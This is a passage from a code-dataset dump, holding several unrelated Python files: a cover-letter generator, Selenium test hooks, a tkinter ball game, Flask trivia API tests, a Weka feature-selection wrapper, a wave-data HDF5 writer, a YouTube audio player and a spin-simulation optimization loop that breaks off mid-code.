This training enhanced both my communication clarity and confidence.\"\nglobal_leadership = \"My prior experience of running an international student council gave me an excellent exercise of both my communication skills and leadership, and provided me a global perspective.\"\nsoftware = \"I feel comfortable working with Microsoft Office applications, such as Excel and Power Point, and analytical software, such as SPSS, SYSTAT and R.\"\nmultitasking = \"I also developed the ability to multitask through balancing my schedule of different research projects, leadership position, and coursework.\"\n\n\nending_body = f\"I feel strongly that my analytical and communication skills, consumer psychology background, and past research experience will make me an excellent fit for the role of Marketing Intern. My global cultural perspective can also contribute to this position. I would welcome the opportunity to discuss the position in further interview. Thank you for your time and consideration.\"\n\n## Output\nprint(\"Dear HR Manager:\")\nprint(\"\")\nprint(intro_p)\nprint(\"\")\n\n\n### Conditional selection of key words from the job description\n# keep the description as one string so substring checks work,\n# and test each keyword explicitly with any(...)\njob_description = job_dict[\"description\"]\nskill_body = \"\"\n\n\nif any(kw in job_description for kw in (\"analytical\", \"research\", \"quantitative\", \"market research\")):\n    print(analytical_research)\n    print(\"\")\n\nif any(kw in job_description for kw in (\"communication\", \"verbal\", \"people\")):\n    skill_body = communication\n\nif any(kw in job_description for kw in (\"global\", \"leadership\")):\n    skill_body = skill_body + global_leadership\n\nif any(kw in job_description for kw in (\"software\", \"Microsoft Office\", \"Excel\", \"PowerPoint\", \"Word\", \"SPSS\", \"R\")):\n    skill_body = skill_body + software\n\nif any(kw in job_description for kw in (\"multitask\", \"organizational\", \"time-management\", \"time management\")):\n    skill_body = skill_body + multitasking\n\n\n\n# if \"market\" or \"marketing\" in job_requirements\n#\n#\nprint(\"SKILL BODY\", skill_body)\n\nprint(\"\")\nprint(\"ENDING BODY\", ending_body)\n## ENDING\nend = f\"\"\"\nSincerely,\n{user_name}\n\"\"\"\nprint(\"FINAL\", end)\n\n\n## Writing the output to a word document\n### Attributed from: https://python-docx.readthedocs.io/en/latest/\ndoc = docx.Document()\n# header = doc.add_heading(user_name, 0)\nheader = doc.add_heading(user_name, 3)\nheader_contact = doc.add_heading(f\"{user_address} | {user_phone} | {user_email}\", 8)\nheader.alignment = WD_ALIGN_PARAGRAPH.CENTER\nheader_contact.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n# header_style_font = header_style.font\n# header_style_font.name = 'Times New Roman'\n# font.header_style_font = Pt(8)\n# header_font = header.font\n# header_font.size = Pt(10)\n# header_font.name = 'Times New Roman'\n# header_font.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\np1 = doc.add_paragraph(start)\np2 = doc.add_paragraph(\"Dear HR Manager:\")\np3 = doc.add_paragraph(intro_p)\np4 = doc.add_paragraph(analytical_research)\np5 = doc.add_paragraph(skill_body)\np6 = doc.add_paragraph(ending_body)\np7 = doc.add_paragraph(end)\nstyle = doc.styles['Normal']\nfont = style.font\nfont.name = 'Times New Roman'\nfont.size = Pt(10)\ndoc.save(f'{company_name}-cover letter.docx')\n","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"414995331","text":"import allure\nfrom 
selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom BehaveBDDWithPageObjects.Utilities import configReader\n\n\ndef before_scenario(context, driver):\n if configReader.readConfig(\"basic info\",\"browser\") == \"chrome\":\n context.driver = webdriver.Chrome(executable_path=ChromeDriverManager().install())\n context.driver.maximize_window()\n context.driver.implicitly_wait(10)\n if configReader.readConfig(\"basic info\",\"browser\") == \"firefox\":\n context.driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n context.driver.maximize_window()\n context.driver.implicitly_wait(10)\n\n\ndef after_scenario(context, driver):\n context.driver.quit()\n\n\ndef after_step(context, step):\n print()\n if step.status == 'failed':\n allure.attach(context.driver.get_screenshot_as_png(), name='screenshot',\n attachment_type=allure.attachment_type.PNG)\n","sub_path":"BehaveBDDWithPageObjects/features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"407186083","text":"# The ball should bounce between the top and bottom edges when run\nfrom tkinter import *\nimport random\nimport time\n\n# Created a window\ntk = Tk()\n\n# Adding a title to our window\ntk.title(\"Game\")\n\n# The window is a fixed size, it cannot be changed\ntk.resizable(0, 0)\n\n# Places the window on top of our other windows\ntk.wm_attributes(\"-topmost\", 1)\n\n# Creates the canvas for our game\n# Passing in parameters: window, dimensions, no border\ncanvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)\n\n# Setting the canvas size to the dimensions above\ncanvas.pack()\n\n# Creates the window with our canvas\ntk.update()\n\n# Let's make our ball\nclass Ball:\n\n # A function that \"initializes\" the ball; it creates the ball\n def __init__(self, canvas, color):\n # Making the bckgrnd the canvas\n self.canvas = canvas\n # Creates the shape and color of the ball\n # (10,10) are the x,y coords for the top-left of the ball\n # (25,25) are the x,y coords for the bot-right of the ball\n # Our ball is 15 x 15\n self.id = canvas.create_oval(10, 10, 25, 25, fill=color)\n # Move the ball to the middle of the canvas: (245,100)\n self.canvas.move(self.id, 245, 100)\n # Setting the ball's initial movement with x & y\n self.x = 0\n self.y = -1\n # We do this so the ball can \"remember\" the height of the canvas\n self.canvas_height = self.canvas.winfo_height()\n \n # We've come back to this again\n def draw(self):\n # These lines below will make the ball bounce when it reaches the edges\n self.canvas.move(self.id, self.x, self.y)\n pos = self.canvas.coords(self.id)\n if pos[1] <= 0:\n self.y = 1\n if pos[3] >= self.canvas_height:\n self.y = -1\n\n# Create the ball, you can change the color \nball = Ball(canvas, 'red')\n\n# Tells tkinter, our window, to update every 1/100 second forver\n# (or at least until we close the window)\nwhile 1:\n # redraw the ball\n ball.draw() # Now, when you run the game, the ball should move up\n tk.update_idletasks()\n tk.update()\n time.sleep(0.01)\n\n","sub_path":"camp_materials/pong/bounce4.py","file_name":"bounce4.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12244996","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy 
import SQLAlchemy\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n # Create error handlers for all expected errors including\n # 400 Bad Request Error.\n # 404 Not Found,\n # Unprocessable Entity 422 x status code occurs when a request is well-formed, however,\n # due to semantic errors it is unable to be processed.\n # 500 Internal Server Error\n\n # Test Functionality\n\n # Test List of Categories\n def test_get_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['categories'])\n\n # Test List of Questions\n def test_get_questions(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], '')\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n\n # Test Pagination\n def test_verify_pagination(self):\n res = self.client().get('/questions?page=1')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], '')\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n if data['total_questions'] > 10:\n self.assertEqual(len(data['questions']), 10)\n\n # Test add question\n def test_add_question(self):\n res = self.client().post('/questions/add',\n json={'question': 'Men who put first foot at the moon',\n 'answer': 'Neil Amstrong', 'category': 4, 'difficulty': 4})\n\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['question'],'Men who put first foot at the moon')\n self.assertEqual(data['answer'],'Neil Amstrong')\n self.assertEqual(data['category'],4)\n self.assertEqual(data['difficulty'],4)\n\n\n # Test play trivia\n def test_play_game(self):\n res = self.client().post('/play',\n json={'quiz_category': {'id': '1', 'type': 'Science'}, 'previous_questions': []})\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n self.assertTrue(data['question']['category'],1)\n\n # Test delete element by id\n\n def test_delete_question_by_id(self):\n res = self.client().delete('/questions/2')\n data = json.loads(res.data)\n question = Question.query.filter(Question.id == 2).one_or_none()\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(question, None)\n self.assertEqual(data['id'], 2)\n\n\n def test_search_by_term(self):\n res = self.client().post('/questions',\n json={'searchTerm': 'What'})\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['success'], True)\n\n\n # 404 NOT FOUND: URL wrote incorrectly.\n\n def 
test_verify_404_categories(self):\n        res = self.client().get('/categori')\n        self.assertEqual(res.status_code, 404)\n\n    def test_verify_404_questions(self):\n        res = self.client().get('/questio')\n        self.assertEqual(res.status_code, 404)\n\n    def test_verify_404_delete_question_by_id(self):\n        res = self.client().delete('/questio/1')\n        self.assertEqual(res.status_code, 404)\n\n    def test_verify_404_question_by_category(self):\n        res = self.client().get('/categories/1/quesons')\n        self.assertEqual(res.status_code, 404)\n\n    def test_verify_404_add_question(self):\n        res = self.client().post('/add')\n        self.assertEqual(res.status_code, 404)\n\n    def test_404_play_game(self):\n        res = self.client().post('/play/', json={'quiz_category': 1, 'previous_questions': []})\n        self.assertEqual(res.status_code, 404)\n\n\n    # 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.\n\n    # Arg quest incorrect\n    def test_verify_400_questions(self):\n        res = self.client().get('/questions', json={'question': 'question??'})\n        self.assertEqual(res.status_code, 400)\n\n    # Arg cat incorrect\n    def test_verify_400_categories(self):\n        res = self.client().get('/categories', json={'cat': 1})\n        self.assertEqual(res.status_code, 400)\n    \n\n    # Args required, incorrect\n    def test_verify_400_add_question(self):\n        res = self.client().post('/questions/add')\n        self.assertEqual(res.status_code, 400)\n\n\n    # 422 Unprocessable Entity: semantically incorrect requests\n\n    # Test delete when the id doesn't exist\n    def test_verify_422_delete_question_by_id(self):\n        res = self.client().delete('/questions/1')\n        self.assertEqual(res.status_code, 422)\n\n    # Test empty answer\n    def test_verify_422_add_question(self):\n        res = self.client().post('/questions/add',\n                                 json={'question': 'Men who put first foot at the moon',\n                                       'answer': '', 'category': 4, 'difficulty': 4})\n        self.assertEqual(res.status_code, 422)\n\n    # 500\n\n    # Bad args type (quiz_category) should be a dict\n    def test_error_500_play_game(self):\n        res = self.client().post('/play',\n                                 json={'quiz_category': 1,\n                                       'previous_questions': None})\n        self.assertEqual(res.status_code, 500)\n\n\n\"\"\"\n    TODO\n    Write at least one test for each test for successful operation and for expected errors.\n    \"\"\"\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499583972","text":"# print all odd numbers in range\n# this approach prints every odd number\n# from start to end on a single line\n\n''' \nstart, end = 1, 15\n \nfor num in range(start, end + 1): \n    if num % 2 != 0: \n        print(num, end = \" \")\n'''\n\n# print all odd numbers from n to m\n\nn, m = [int(x) for x in input().split()]\nfor i in range(n, m + 1):\n    if i % 2 == 1:\n        print(i)","sub_path":"Дасгалууд/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253343547","text":"\"\"\"\r\nModule containing functions responsible for selecting an informative subset of features, to obtain the best accuracy.\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nimport subprocess\r\nimport tempfile\r\nfrom markets.dataset import TweetsDataSet\r\nfrom markets.tweets_features_extraction import remark_features\r\n\r\nASSOCIATION_MODEL_FILE 
= os.path.join(os.path.dirname(__file__), \"assoc_model.pickle\")\r\npd.set_option('display.width', 1500)\r\nWEKA_JAR_FILE = os.path.join(os.path.dirname(__file__), \"weka-3-8-2\", \"weka.jar\")\r\n\r\n\r\ndef read_features_from_file(filename):\r\n return [line.strip() for line in open(filename, 'r')]\r\n\r\n\r\ndef select_features(df, filename):\r\n if os.path.isfile(filename):\r\n features = read_features_from_file(filename)\r\n else:\r\n features = get_features_from_weka(df)\r\n save_selected_features(features, filename)\r\n\r\n main_df = filter_features(df, features)\r\n return main_df\r\n\r\n\r\ndef save_selected_features(list_of_features, filename):\r\n with open(filename, \"w\") as f:\r\n f.write(\"\\n\".join(list_of_features))\r\n\r\n\r\ndef filter_features(dataset, features_to_leave, with_dropping=True):\r\n sifted_dataset = TweetsDataSet(dataset.get_no_features_df())\r\n remark_features(sifted_dataset, features_to_leave, with_dropping)\r\n return sifted_dataset\r\n\r\n\r\ndef save_features_with_target_to_file(df, filename):\r\n df = df.drop(columns=[\"Text\", \"Tweet_sentiment\"])\r\n df.to_csv(filename, index=False)\r\n\r\n\r\ndef run_weka_with_file(temp_filename):\r\n command = ['java', '-classpath', WEKA_JAR_FILE,\r\n 'weka.attributeSelection.WrapperSubsetEval',\r\n '-T', '0.5',\r\n '-B', 'weka.classifiers.bayes.NaiveBayesMultinomial',\r\n '-s', 'weka.attributeSelection.BestFirst',\r\n '-i', temp_filename]\r\n stdoutdata = subprocess.getoutput(command)\r\n found_features = False\r\n features = []\r\n for l in stdoutdata.split(\"\\n\"):\r\n if found_features:\r\n features.append(l.strip())\r\n if l.startswith(\"Selected attributes:\"):\r\n found_features = True\r\n features = [f for f in features if f] # make sure no empty line added\r\n if not features:\r\n print(stdoutdata)\r\n raise Exception(\"Problem while doing feature selection with Weka library.\")\r\n\r\n return features\r\n\r\n\r\ndef get_features_from_weka(df):\r\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".csv\") as fp:\r\n save_features_with_target_to_file(df, fp.name)\r\n features = run_weka_with_file(fp.name)\r\n return features\r\n","sub_path":"markets/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85897347","text":"import numpy as np\nimport h5py, glob, os\nimport read_field_ww3 as rfww3\nimport wis_h5_out as wh5\n#from write_atl_att import write_top_level_att\n#from write_atl_att import write_field_attr\n\nclass ww3:\n def __init__(self,yearmon,uname):\n self.yearmon = yearmon\n self.uname = uname\n self.varname = {'wavhs':'hs','wavtp':'fp','wavdir':'dir','wavspr':'spr','wavhs_wndsea':'phs_sea','wavtp_wndsea':'ptp_sea','wavdir_wndsea':'pdi_sea','wavhs_swell1':'phs_sw1','wavtp_swell1':'ptp_sw1','wavdir_swell1':'pdi_sw1','wavhs_swell2':'phs_sw2','wavtp_swell2':'ptp_sw2','wavdir_swell2':'pdi_sw2','wnd_u':'wnd','wnd_v':'wnd'}\n h5fn = 'Wis_test_field.h5'\n h5file = h5py.File(h5fn,'w')\n # write_top_level_att(h5fname)\n for key in self.varname.keys():\n tt, header, dataf = rfww3.read_fields_ww3('./',self.varname[key],key)\n if 'time' not in h5file.keys():\n self.tt = tt\n self.time2date()\n dataset = h5file.create_dataset('time',(self.pytime.shape),dtype=('f8'))\n dataset[...] = self.pytime\n dataset = h5file.create_dataset('datetime',(self.dattime.shape),dtype=('i4'))\n dataset[...] 
= self.dattime\n h5file.attrs['longitude'] = header['lonw'], header['lone']\n h5file.attrs['latitude'] = header['lats'], header['latn']\n h5file.attrs['nlon'] = header['ilon']\n h5file.attrs['nlat'] = header['jlat']\n \n dataset = h5file.create_dataset(key,(dataf.shape),dtype=('i4'))\n dataset[...] = dataf\n\n wh5.create_field_var_att(h5file,self.varname.keys())\n h5file.close()\n \n \n def time2date(self):\n import datetime as DT\n self.pytime = np.zeros((self.tt.shape[0],1))\n self.dattime = np.zeros((self.tt.shape[0],6))\n for ii in range(self.tt.shape[0]):\n stdate = str(self.tt[ii][0])\n sttime = str(self.tt[ii][1])\n if len(sttime) == 5:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),int(sttime[:1]),int(sttime[1:3]),int(sttime[3:5]))\n elif len(sttime) == 1:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),0,0,0)\n else:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),int(sttime[:2]),int(sttime[2:4]),int(sttime[4:6]))\n self.pytime[ii] = DT.datetime.toordinal(dtime) + dtime.hour/24. + dtime.minute/(24.*60.) + dtime.second/(3600.*24.)\n self.dattime[ii,:] = dtime.year,dtime.month,dtime.day,dtime.hour,dtime.minute,dtime.second\n\n\n","sub_path":"test_save_point_loc/create_field_hdf5.py","file_name":"create_field_hdf5.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443344225","text":"import vlc\nimport pafy\nfrom youtubesearchpython import VideosSearch\nimport random\n\n'''\n~~Code resources~~\nYoutube URL generation library docs\nhttps://pypi.org/project/youtube-search-python/\n\nPlaying Youtube videos usin VLC\nhttps://stackoverflow.com/questions/49354232/how-to-stream-audio-from-a-youtube-url-in-python-without-download\nhttps://stackoverflow.com/questions/56611337/python-vlc-doesnt-plays-and-response-with-the-youtube-video-link\n'''\n\ndef generateURLYouTubeSearch(searchQuery):\n search = VideosSearch(searchQuery + ' music', limit=20)\n searchIndex = random.randint(0, 19)\n url = search.result()['result'][searchIndex]['link']\n return url\n\n'''\nrequires libvlc\n'''\ndef playYouTubeAudio(url, player):\n video = pafy.new(url)\n best = video.getbest()\n playurl = best.url\n\n #To play with video remove no-video\n Media = ins.media_new(playurl, \":no-video\")\n Media.get_mrl()\n player.set_media(Media)\n player.play()\n\n\n#Only runs when you run this file.\nif __name__ == '__main__':\n url = generateURLYouTubeSearch(input(\"insert a search: \"))\n\n ins = vlc.Instance()\n mediaPlayer = ins.media_player_new()\n playYouTubeAudio(url, mediaPlayer)\n\n command = ''\n while(command != 'yes'):\n command = input(\"Stop Playing: \")\n mediaPlayer.stop()","sub_path":"sam/MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"23156844","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport getopt\nimport numpy as np\nfrom scipy.optimize import minimize\n\nfrom ROOT import gSystem\n\ngSystem.Load('/data1/cmswank/spin-sim-xliu/runShared.so') #the fancy stuff broke after c libraries updated. 
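\n# Sketch of a defensive variant of the load above (the script itself does not\n# check the status): TSystem::Load returns 0 on success, 1 if the library was\n# already loaded, and a negative value on failure, so e.g.\n#     if gSystem.Load('/data1/cmswank/spin-sim-xliu/runShared.so') < 0:\n#         raise RuntimeError('could not load runShared.so')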
\n\nfrom ROOT import Run, RunParameters\n\ndef create_run(run_id, opts):\n run = Run(run_id)\n if Run.FileExists(run.filename):\n print(\"%s already exists\" % (run.filename, ))\n if '-c' not in opts:\n raise ValueError('Need -c parameter to continue existing run')\n if '-p' in opts:\n print(\"W: ignoring parameter file %s\" % (opts['-p'],))\n if run.loadRun() != 0:\n raise ValueError(\"Could not load run %d\" % (run_id,))\n print(\"%d entries found\" % (run.nCurrent,))\n if '-n' in opts:\n n = int(opts['-n'])\n if n <= run.nCurrent:\n raise ValueError('use -n to continue to a number larger than %d' % (run.nCurrent,))\n run.parameters.nEntries = n\n print(\"continuing to %d\" % (run.parameters.nEntries,))\n else:\n if '-c' in opts:\n raise ValueError('-c fails. Nothing to continue, or %s not found' % (run.filename,))\n if '-p' not in opts:\n raise ValueError('need to specify parameter file with -p')\n run.parameters.ParseParameterFile(opts['-p'])\n if '-n' in opts:\n n = int(opts['-n'])\n print('-n used. Overriding nEntries %d -> %d' % (run.parameters.nEntries, n))\n run.parameters.nEntries = n\n run.nCurrent = 0\n run.parameters.PrintParameters()\n if '--numerical' in opts:\n run.parameters.numerical_method = int(opts['--numerical'])\n run.InitializeRun()\n run.InitializeTFile()\n return run\n\n################################## Optimization Loop !!!!!!!!!!\n\ndef single_loop(x1,run):\n \n print(\"Starting run %d for x1 = %f...\" % (run.runID,x1[0]))\n Sxn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Syn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Szn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sx3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sy3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sz3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n tsim=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n run.nCurrent=0;\n\n\n while run.nCurrent < run.parameters.nEntries:\n rn=run.nCurrent\n rnf=run.nCurrent*1.0000\n norsf=run.parameters.nEntries*1.0000;\n if 1==1: #2.9817*(1+1E-2*(x1[0]-1.0)) < 3.1 and 2.9817*(1+1E-2*(x1[0]-1.0)) > 2.9 : #careful. \n\n \n #B1=0.000250021223525*(1+5E-5*rn//2)\n #print \"Bz1 = \"+str(B1)+\",\"\n #run.EraseFieldFormula();\n #run.parameters.field_assignment(\"BzAdd\",str(B1))\n #run.parameters.Pulseparam[1]=rn//2+1;\n ##E field Variation\n #if rn%2==0:\n #run.parameters.E0[0]=-run.parameters.E0[0];\n #run.parameters.E0[0]=0.0;\n \n\n #run.parameters.E0[0]=0.; \n run.parameters.simType=rn%2\n \n if rn%2==0:\n run.parameters.seed=82*(rn+1)\n #run.parameters.seed=82*(rn+1) \n #4.02497057364e-05; best critically dressed for 5.2 uT. 103 Hz. 8 significant digits.\n #Best for robust dressing at 5.2 uT 200 Hz mod, B1=4.205e-5; modulation amplitude = 3.497!. \n #Best for robust dressing at 5.2 uT 300 Hz mod, B1=4.42958e-5; modulation amplitude = 3.32973!. \n #best for robust dresssing at 5.2 uT 550Hz mod, B1=5.3491388e-05; mod amp= 2.591036\n\n #best for rcd 5.2 uT 200Hz mod CONSTANT POWER amp= 0.074262070170000, B1=5.22583821E-5\n #8.2968e-05 3225.4323 -2708.6339 0.0011028 0.0036526\n #rcd const power 0.05 opt 8.9866e-05 2897.1981 -2414.8694 0.0012682 0.0034519\n #rcd const power 0.1 opt 8.4395e-05 2966.3542 -2534.4201 0.0012507 0.0034669\n #The reason const power doesn't work is that it isn't floquet in the previous method,\n #The new method optimizes B1, omega, and fm t1 and t2, but solves for wrf_amp so that it is floquet. 
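\n            # note: every tuned parameter below follows the same relative-perturbation\n            # convention, p = p0*(1 + 1e-2*(x - 1)): x = 1 keeps the nominal value p0\n            # and one unit of x shifts p by one percent.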
\n #hopefully this means it can find a solution at 0.005 and if its good enough it will work for all time. \n #Hopefully. \n #at this moment the phase go to 4*Pi for the fm to go one cycle. \n #it didn't really find a solution. uh ohh. this might not work. \n #IT DIDNT WORK\n #2, 5.992436587477e+03, 0.0, 1.030520983610e+02, -7.836933948788e+02, 1.084752848683e-03, 6.075986503570e-03, 1.570796327;\n #BzAdd = \"3.668263691837e-05\";\n #IT FOUND CRITICAL DRESSING!!!!! ugg..\n #not a terrible place to start from?\n\n\n wm=2*np.pi*run.parameters.SDparam[3];\n #B1=8.463e-05*(1+1E-2*(x1[0]-1.0));#5.3491388e-05#4.205e-5#5.3491388E-5#4.205e-5#5.347e-05*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#4.02444353976e-05*(1+1E-4*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#0.000250021223525*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#\n #print \"Bz1 = \"+str(B1)+\"\\n\"\n #run.EraseFieldFormula();\n #run.parameters.field_assignment(\"BzAdd\",str(B1))\n \n #SDparam[4]=2.9817 is for amplitude RCD\n #run.parameters.SDparam[4]=2.9817*(1+1E-2*(x1[0]-1.0));#3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #run.parameters.SDparam[1]=2960.3236*(1+1E-2*(x1[1]-1.0));#This is wrf or b 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #we fina\n\n\n B1=3.668263691837e-05*(1+1E-2*(x1[0]-1.0));\n run.EraseFieldFormula();\n run.parameters.field_assignment(\"BzAdd\",str(B1))\n\n run.parameters.SDparam[1]=5.992436587477e+03*(1+1E-2*(x1[1]-1.0));#This is wrf or b 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n\n run.parameters.SDparam[3]=1.030520983610e+02*(1+1E-2*(x1[2]-1.0)); #mo\n run.parameters.totalTime=1./(run.parameters.SDparam[3]);\n if run.parameters.SDparam[3] > 600:\n run.parameters.SDparam[3] = 600;\n #run.parameters.SDparam[4]=-2527.5024*(1+1E-2*(x1[2]-1.0));#This is wrf_amp or c 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n run.parameters.SDparam[5]=0.7500000000e-3*(1+1E-2*(x1[3]-1.0));#this is t1 (transition time) 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n run.parameters.SDparam[6]=0.4250000000e-2*(1+1E-2*(x1[4]-1.0));#this is t2 (transition time 2) 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n \n if run.parameters.SDparam[5]>0.975*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[5]=0.975*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[5])+\"\\n\")\n if run.parameters.SDparam[5]<0.025*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[5]=0.025*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[5])+\"\\n\")\n \n if run.parameters.SDparam[6]>0.975*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[6]=0.975*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[6])+\"\\n\")\n if run.parameters.SDparam[6]<0.025*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[6]=0.025*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[6])+\"\\n\")\n \n\n\n #print \"x1 = \"+str(run.parameters.SDparam[4])+\"\\n\"\n #print \"Mod amp = \"+str(run.parameters.SDparam[4]*B1/3.57E-5)+\"\\n\"\n #6 7 Bz1 = 4.1915874e-05\n\n #\n #run.parameters.Pulseparam[3]=1.245#*(1+.05*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))\n 
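# note: the clamps above keep both transition times inside one modulation\n            # period 1/fm (fm = SDparam[3]), i.e. t = min(max(t, 0.025/fm), 0.975/fm).\n            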
#run.parameters.Pulseparam[2]=0.708#*(1+0.1*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#7 is noise rng seed. \n #Neutrons:\n #3845.309408, 6283.18530718\n #\n #phase=0;#np.pi/4;#np.pi/2;#np.pi/4.0;\n #phi=np.pi/8;\n\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=1E-23 this is e meters. (ugghhh)\n #run.parameters.edm=0\n #run.parameters.speed=5\n #if rn%4==0:\n #run.parameters.SDparam[2]=np.pi*(rnf/norsf)\n #run.parameters.SDparam[2]=0.0;\n \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed.\n #print \"B1phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #run.parameters.Pulseparam[1]=(rn//2+2) \n #offset in another cell, \n \n else:\n #3He:\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=0\n #run.parameters.E\n #print \"phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #7 is noise rng seed. \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed. \n #678742112 #seed is trajectory rng. \n run.ReloadParameters();\n \n ret = run.runNeutronQuiet();\n\n\n\n if ret == 0:\n ii=0;#run.parameters.nBins-99\n if rn%2==0:\n #Sxn=run.neutronData.spinx[run.parameters.nBins];\n #Syn=run.neutronData.spiny[run.parameters.nBins];\n #Szn=run.neutronData.spinz[run.parameters.nBins]; \n for i in range(0,run.parameters.nBins+1,1):\n Sxn[rn//2][ii]=run.neutronData.spinx[i];\n Syn[rn//2][ii]=run.neutronData.spiny[i];\n Szn[rn//2][ii]=run.neutronData.spinz[i];\n tsim[rn//2][ii]=run.neutronData.time[i];\n #print run.neutronData.spinz[i];\n ii=ii+1;\n else:\n #Sx3=run.neutronData.spinx[run.parameters.nBins];\n #Sy3=run.neutronData.spiny[run.parameters.nBins];\n 